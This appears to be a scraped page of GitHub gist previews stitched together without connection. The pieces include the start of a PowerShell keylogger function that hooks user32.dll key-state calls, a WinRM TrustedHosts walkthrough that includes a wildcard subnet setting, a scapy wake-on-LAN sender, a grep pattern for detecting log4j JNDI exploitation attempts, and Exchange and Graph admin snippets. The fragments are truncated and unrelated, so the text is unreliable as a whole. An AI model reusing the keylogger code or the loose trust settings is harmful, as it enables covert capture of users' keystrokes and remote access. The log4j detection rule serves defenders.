Slides and code examples from my "Pythons Sinister Secrets" presentation.
The slide deck can be downloaded here.
https://github.com/MarkBaggett/MarkBaggett/blob/master/Python's%20Sinister%20Secrets%20SlideDeck.pdf
#requires -version 2 | |
<# | |
.SYNOPSIS | |
<Overview of script> | |
.DESCRIPTION | |
<Brief description of script> | |
.PARAMETER <Parameter_Name> | |
<Brief description of parameter input required. Repeat this attribute if required> |
## Hey folks, this is just a quick walkthrough on modifying the trusted hosts property in WSMAN using Powershell | |
# By default PowerShell loads a PSDrive for the WinRM service | |
# We modify the trusted hosts property using the Set-Item cmdlet | |
Set-Item WSMan:\localhost\Client\TrustedHosts -value 192.168.1.13 | |
#This sets the value to 192.168.1.13, it also overwrites any existing values | |
# If you want to set a subnet you can use the PowerShell wildcard character | |
Set-Item WSMan:\localhost\Client\TrustedHosts -value 192.168.1.* |
#requires -Version 2 | |
function Start-KeyLogger($Path="$env:temp\keylogger.txt") | |
{ | |
# Signatures for API Calls | |
$signatures = @' | |
[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] | |
public static extern short GetAsyncKeyState(int virtualKeyCode); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] | |
public static extern int GetKeyboardState(byte[] keystate); | |
[DllImport("user32.dll", CharSet=CharSet.Auto)] |
# THIS CODE IS PROVIDED AS IS WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING ANY IMPLIED WARRANTIES OF | |
# FITNESS FOR A PARTICULAR PURPOSE, MERCHANTABILITY, OR NON-INFRINGEMENT. | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Authentication" ; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.DirectoryObjects"; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Identity.SignIns"; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Applications" ; ModuleVersion="2.15.0" } | |
#Requires -Modules @{ ModuleName="Microsoft.Graph.Users" ; ModuleVersion="2.15.0" } | |
<# |
Slides and code examples from my "Pythons Sinister Secrets" presentation.
The slide deck can be downloaded here.
https://github.com/MarkBaggett/MarkBaggett/blob/master/Python's%20Sinister%20Secrets%20SlideDeck.pdf
from scapy.sendrecv import send | |
from scapy.layers.inet import * | |
from binascii import unhexlify | |
import sys | |
magic = '' | |
for h in sys.argv[1].split(':'): magic += unhexlify(h); | |
send(IP(dst="255.255.255.255")/UDP(dport=9)/Raw(load=(chr(0xff)*6 + magic*16))) |
The PowerShell updatable help system is a useful, if not under-utilised, way to supply up-to-date support documentation for your module. While its implementation and ongoing support from Microsoft for native PowerShell modules is questionable (in my opinion) to begin with, it remains under-used and, in many cases, an unrecognised method of supplying updates to help documentation. This may be, in part, related to the complicated way in which PowerShell is
You can use these commands and rules to search for exploitation attempts against log4j RCE vulnerability CVE-2021-44228
This command searches for exploitation attempts in uncompressed files in folder /var/log
and all sub folders
sudo egrep -I -i -r '\$(\{|%7B)jndi:(ldap[s]?|rmi|dns|nis|iiop|corba|nds|http):/[^\n]+' /var/log
# Must be connected to Exchange Online | |
# Gets all Quarantined messages from the last week | |
# Results are grouped by recipient | |
Get-MessageTrace -EndDate (Get-Date) -StartDate (Get-Date).adddays(-7) -Status Quarantined | | |
Sort-Object -Property RecipientAddress | | |
Format-Table -GroupBy RecipientAddress |
https://thedfirreport.com/ | |
https://www.zerodayinitiative.com/blog/ | |
https://codewhitesec.blogspot.com/ | |
https://www.digitalshadows.com/blog-and-research/ | |
https://blog.talosintelligence.com/ | |
https://www.riskiq.com/blog/ | |
https://www.sekoia.io/en/blog-sekoia-io/ | |
https://www.nextron-systems.com/blog/ | |
https://www.microsoft.com/security/blog/ | |
https://blog.truesec.com/ |